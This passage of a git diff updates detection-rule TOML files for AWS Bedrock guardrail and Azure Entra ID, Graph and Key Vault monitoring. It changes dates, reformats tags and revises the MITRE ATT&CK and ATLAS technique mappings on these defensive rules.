diff --git a/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_by_single_user.toml b/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_by_single_user.toml index b4749c143ba..2f835ffd183 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_by_single_user.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_by_single_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2025/09/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,15 +68,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = [ - "Domain: LLM", - "Data Source: AWS Bedrock", - "Data Source: AWS S3", - "Resources: Investigation Guide", - "Use Case: Policy Violation", - "Mitre Atlas: T0051", - "Mitre Atlas: T0054", -] +tags = ["Domain: LLM", "Tactic: Defense Evasion", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054"] timestamp_override = "event.ingested" type = "esql" @@ -107,3 +99,15 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_violations_count desc ''' +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0015" +name = "Evade AI Model" +reference = "https://atlas.mitre.org/techniques/AML.T0015/" + +[rule.threat.tactic] +id = "AML.TA0007" +name = "Defense Evasion" +reference = "https://atlas.mitre.org/tactics/AML.TA0007/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_in_single_request.toml b/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_in_single_request.toml index 1ea547c91c7..cccd06e4041 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_in_single_request.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_in_single_request.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2025/11/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,15 +68,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "low" -tags = [ - "Domain: LLM", - "Data Source: AWS Bedrock", - "Data Source: AWS S3", - "Resources: Investigation Guide", - "Use Case: Policy Violation", - "Mitre Atlas: T0051", - "Mitre Atlas: T0054", -] +tags = ["Domain: LLM", "Tactic: Defense Evasion", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054"] timestamp_override = "event.ingested" type = "esql" @@ -116,3 +108,15 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_policy_violations_total_unique_requests_count desc ''' +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0015" +name = "Evade AI Model" +reference = "https://atlas.mitre.org/techniques/AML.T0015/" + +[rule.threat.tactic] +id = "AML.TA0007" +name = "Defense Evasion" +reference = "https://atlas.mitre.org/tactics/AML.TA0007/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_high_confidence_misconduct_blocks_detected.toml b/rules/integrations/aws_bedrock/aws_bedrock_high_confidence_misconduct_blocks_detected.toml index f2706780c70..e69765cf766 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_high_confidence_misconduct_blocks_detected.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_high_confidence_misconduct_blocks_detected.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/05" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2025/11/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,15 +67,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = [ - "Domain: LLM", - "Data Source: AWS Bedrock", - "Data Source: AWS S3", - "Use Case: Policy Violation", - "Mitre Atlas: T0051", - "Mitre Atlas: T0054", - "Resources: Investigation Guide", -] +tags = ["Domain: LLM", "Tactic: Execution", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -120,3 +112,15 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_policy_blocked_violation_total_count desc ''' +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0051" +name = "LLM Prompt Injection" +reference = "https://atlas.mitre.org/techniques/AML.T0051/" + +[rule.threat.tactic] +id = "AML.TA0005" +name = "Execution" +reference = "https://atlas.mitre.org/tactics/AML.TA0005/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_high_resource_consumption_detection.toml b/rules/integrations/aws_bedrock/aws_bedrock_high_resource_consumption_detection.toml index 6a2358b50ba..f8addb7be34 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_high_resource_consumption_detection.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_high_resource_consumption_detection.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/04" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2025/09/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,16 +66,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = [ - "Domain: LLM", - "Data Source: AWS Bedrock", - "Data Source: Amazon Web Services", - "Data Source: AWS S3", - "Use Case: Potential Overload", - "Use Case: Resource Exhaustion", - "Mitre Atlas: LLM04", - "Resources: Investigation Guide", -] +tags = ["Domain: LLM", "Tactic: Exfiltration", "Tactic: Impact", "Tactic: AI Model Access", "Data Source: AWS Bedrock", "Data Source: Amazon Web Services", "Data Source: AWS S3", "Use Case: Potential Overload", "Use Case: Resource Exhaustion", "Mitre Atlas: LLM04", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -115,3 +106,72 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_risk_score desc ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1020" +name = "Automated Exfiltration" +reference = "https://attack.mitre.org/techniques/T1020/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1499" +name = "Endpoint Denial of Service" +reference = "https://attack.mitre.org/techniques/T1499/" + +[[rule.threat.technique.subtechnique]] +id = "T1499.003" +name = "Application Exhaustion Flood" +reference = "https://attack.mitre.org/techniques/T1499/003/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0040" +name = "AI Model Inference API Access" +reference = "https://atlas.mitre.org/techniques/AML.T0040/" + +[rule.threat.tactic] +id = "AML.TA0000" +name = "AI Model Access" +reference = "https://atlas.mitre.org/tactics/AML.TA0000/" + +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0024" +name = "Exfiltration via AI Inference API" +reference = "https://atlas.mitre.org/techniques/AML.T0024/" + +[rule.threat.tactic] +id = "AML.TA0010" +name = "Exfiltration" +reference = "https://atlas.mitre.org/tactics/AML.TA0010/" + +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0046" +name = "Spamming AI System with Chaff Data" +reference = "https://atlas.mitre.org/techniques/AML.T0046/" + +[rule.threat.tactic] +id = "AML.TA0011" +name = "Impact" +reference = "https://atlas.mitre.org/tactics/AML.TA0011/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_attempts_to_use_denied_models_by_user.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_attempts_to_use_denied_models_by_user.toml index ac6eb38eb16..bb89d860f1b 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_attempts_to_use_denied_models_by_user.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_attempts_to_use_denied_models_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2025/09/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,15 +64,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "high" -tags = [ - "Domain: LLM", - "Data Source: AWS Bedrock", - "Data Source: AWS S3", - "Resources: Investigation Guide", - "Use Case: Policy Violation", - "Mitre Atlas: T0015", - "Mitre Atlas: T0034", -] +tags = ["Domain: LLM", "Tactic: AI Model Access", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Policy Violation", "Mitre Atlas: T0015", "Mitre Atlas: T0034"] timestamp_override = "event.ingested" type = "esql" @@ -109,3 +101,15 @@ from logs-aws_bedrock.invocation-* [rule.investigation_fields] field_names = ["user.id", "cloud.account.id", "gen_ai.request.model.id", "total_denials"] +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0040" +name = "AI Model Inference API Access" +reference = "https://atlas.mitre.org/techniques/AML.T0040/" + +[rule.threat.tactic] +id = "AML.TA0000" +name = "AI Model Access" +reference = "https://atlas.mitre.org/tactics/AML.TA0000/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_sensitive_information_policy_blocks_detected.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_sensitive_information_policy_blocks_detected.toml index 2e665685b4f..b5824163b1e 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_sensitive_information_policy_blocks_detected.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_sensitive_information_policy_blocks_detected.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/20" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2025/11/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,15 +66,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = [ - "Domain: LLM", - "Data Source: AWS Bedrock", - "Data Source: AWS S3", - "Use Case: Policy Violation", - "Mitre Atlas: T0051", - "Mitre Atlas: T0054", - "Resources: Investigation Guide", -] +tags = ["Domain: LLM", "Tactic: Discovery", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -106,3 +98,15 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_policy_blocked_sensitive_info_count desc ''' +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0089" +name = "Process Discovery" +reference = "https://atlas.mitre.org/techniques/AML.T0089/" + +[rule.threat.tactic] +id = "AML.TA0008" +name = "Discovery" +reference = "https://atlas.mitre.org/tactics/AML.TA0008/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_topic_policy_blocks_detected.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_topic_policy_blocks_detected.toml index c98ff4ef1f5..c2a53901fee 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_topic_policy_blocks_detected.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_topic_policy_blocks_detected.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/20" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2025/11/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,15 +66,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = [ - "Domain: LLM", - "Data Source: AWS Bedrock", - "Data Source: AWS S3", - "Use Case: Policy Violation", - "Mitre Atlas: T0051", - "Mitre Atlas: T0054", - "Resources: Investigation Guide", -] +tags = ["Domain: LLM", "Tactic: Discovery", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -106,3 +98,15 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_policy_blocked_topic_count desc ''' +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0069" +name = "Discover LLM System Information" +reference = "https://atlas.mitre.org/techniques/AML.T0069/" + +[rule.threat.tactic] +id = "AML.TA0008" +name = "Discovery" +reference = "https://atlas.mitre.org/tactics/AML.TA0008/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_validation_exception_errors_by_single_user.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_validation_exception_errors_by_single_user.toml index 360900d81b5..19935aec2b5 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_validation_exception_errors_by_single_user.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_validation_exception_errors_by_single_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/11" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2025/07/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,17 +67,7 @@ This rule requires that AWS Bedrock Integration be configured. For more informat https://www.elastic.co/docs/current/integrations/aws_bedrock """ severity = "high" -tags = [ - "Domain: LLM", - "Data Source: AWS", - "Data Source: AWS Bedrock", - "Data Source: AWS S3", - "Use Case: Policy Violation", - "Mitre Atlas: T0015", - "Mitre Atlas: T0034", - "Mitre Atlas: T0046", - "Resources: Investigation Guide", -] +tags = ["Domain: LLM", "Tactic: AI Model Access", "Data Source: AWS", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0015", "Mitre Atlas: T0034", "Mitre Atlas: T0046", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -115,3 +105,15 @@ from logs-aws_bedrock.invocation-* [rule.investigation_fields] field_names = ["target_time_window", "user.id", "cloud.account.id", "total_denials"] +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0040" +name = "AI Model Inference API Access" +reference = "https://atlas.mitre.org/techniques/AML.T0040/" + +[rule.threat.tactic] +id = "AML.TA0000" +name = "AI Model Access" +reference = "https://atlas.mitre.org/tactics/AML.TA0000/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_word_policy_blocks_detected.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_word_policy_blocks_detected.toml index e59b0217bfd..3410cb1a594 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_word_policy_blocks_detected.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_word_policy_blocks_detected.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/20" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2025/11/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,15 +66,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = [ - "Domain: LLM", - "Data Source: AWS Bedrock", - "Data Source: AWS S3", - "Use Case: Policy Violation", - "Mitre Atlas: T0051", - "Mitre Atlas: T0054", - "Resources: Investigation Guide", -] +tags = ["Domain: LLM", "Tactic: Discovery", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -106,3 +98,20 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_policy_blocked_profanity_count desc ''' +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0084" +name = "Discover AI Agent Configuration" +reference = "https://atlas.mitre.org/techniques/AML.T0084/" + +[[rule.threat.technique]] +id = "AML.T0089" +name = "Process Discovery" +reference = "https://atlas.mitre.org/techniques/AML.T0089/" + +[rule.threat.tactic] +id = "AML.TA0008" +name = "Discovery" +reference = "https://atlas.mitre.org/tactics/AML.TA0008/" diff --git a/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml b/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml index aa6c1fdbe9e..93c5d59841a 100644 --- a/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml +++ b/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/01" integration = ["azure"] maturity = "production" -updated_date = "2026/02/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -119,16 +119,21 @@ event.dataset:azure.signinlogs [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" + [[rule.threat.technique.subtechnique]] id = "T1213.002" name = "Sharepoint" reference = "https://attack.mitre.org/techniques/T1213/002/" - +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" [rule.threat.tactic] id = "TA0009" @@ -137,17 +142,21 @@ reference = "https://attack.mitre.org/tactics/TA0009/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - [rule.new_terms] field = "new_terms_fields" value = ["azure.signinlogs.properties.app_id", "azure.signinlogs.properties.tenant_id"] diff --git a/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml b/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml index 3f48cab4cf9..6c94f0ef0c2 100644 --- a/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml +++ b/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/06" integration = ["azure"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,17 +101,21 @@ event.dataset:azure.graphactivitylogs [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" +[[rule.threat.technique.subtechnique]] +id = "T1114.002" +name = "Remote Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/002/" [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml b/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml index a94c27b574e..07c41f830ef 100644 --- a/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml +++ b/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/02" integration = ["azure"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -110,30 +110,13 @@ from logs-azure.signinlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/azure/credential_access_azure_storage_account_keys_accessed.toml b/rules/integrations/azure/credential_access_azure_storage_account_keys_accessed.toml index 275eddfe849..3e8f36dcffc 100644 --- a/rules/integrations/azure/credential_access_azure_storage_account_keys_accessed.toml +++ b/rules/integrations/azure/credential_access_azure_storage_account_keys_accessed.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/23" integration = ["azure"] maturity = "production" -updated_date = "2025/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -96,34 +96,13 @@ value = "now-7d" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1555" -name = "Credentials from Password Stores" -reference = "https://attack.mitre.org/techniques/T1555/" -[[rule.threat.technique.subtechnique]] -id = "T1555.006" -name = "Cloud Secrets Management Stores" -reference = "https://attack.mitre.org/techniques/T1555/006/" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" \ No newline at end of file diff --git a/rules/integrations/azure/credential_access_entra_id_excessive_account_lockouts.toml b/rules/integrations/azure/credential_access_entra_id_excessive_account_lockouts.toml index a0016af7ce5..1bbd401d0e9 100644 --- a/rules/integrations/azure/credential_access_entra_id_excessive_account_lockouts.toml +++ b/rules/integrations/azure/credential_access_entra_id_excessive_account_lockouts.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "Changing min stack to 9.1.0, the latest minimum supported version for 9.X releases." min_stack_version = "9.1.0" -updated_date = "2026/01/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -107,32 +107,21 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" + [[rule.threat.technique.subtechnique]] id = "T1110.001" name = "Password Guessing" reference = "https://attack.mitre.org/techniques/T1110/001/" -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" - -[[rule.threat.technique.subtechnique]] -id = "T1110.004" -name = "Credential Stuffing" -reference = "https://attack.mitre.org/techniques/T1110/004/" - - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.threshold] field = [] value = 30 diff --git a/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml b/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml index b1e86ae2c14..bf8c794d9eb 100644 --- a/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml +++ b/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/28" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,17 +54,7 @@ setup = """#### Required Azure Entra Sign-In Logs This rule requires the Azure logs integration be enabled and configured to collect all logs, including sign-in logs from Entra. In Entra, sign-in logs must be enabled and streaming to the Event Hub used for the Azure logs integration. """ severity = "high" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra ID Sign-in", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -135,30 +125,31 @@ from logs-azure.signinlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/credential_access_entra_id_totp_brute_force_attempts.toml b/rules/integrations/azure/credential_access_entra_id_totp_brute_force_attempts.toml index a4e8626eee9..b4936e24a57 100644 --- a/rules/integrations/azure/credential_access_entra_id_totp_brute_force_attempts.toml +++ b/rules/integrations/azure/credential_access_entra_id_totp_brute_force_attempts.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/11" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -161,19 +161,13 @@ from logs-azure.signinlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.001" -name = "Password Guessing" -reference = "https://attack.mitre.org/techniques/T1110/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml b/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml index b1b7021a706..4b240b4a0cf 100644 --- a/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml +++ b/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/10" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -70,18 +70,7 @@ To ensure this rule functions correctly, the following diagnostic logs must be e - AuditEvent: This log captures all read and write operations performed on the Key Vault, including secret, key, and certificate retrievals. These logs should be streamed to the Event Hub used for the Azure integration configuration. """ severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: Storage", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Azure Platform Logs", - "Data Source: Azure Key Vault", - "Use Case: Threat Detection", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Storage", "Domain: Identity", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Azure", "Data Source: Azure Platform Logs", "Data Source: Azure Key Vault", "Use Case: Threat Detection", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -175,19 +164,31 @@ by Esql.time_window_date_trunc, azure.platformlogs.identity.claim.upn [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.006" name = "Cloud Secrets Management Stores" reference = "https://attack.mitre.org/techniques/T1555/006/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml index 8a88cceeb2f..6bad05244fd 100644 --- a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml +++ b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["azure"] maturity = "production" -updated_date = "2025/09/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,13 +67,7 @@ references = [ risk_score = 21 rule_id = 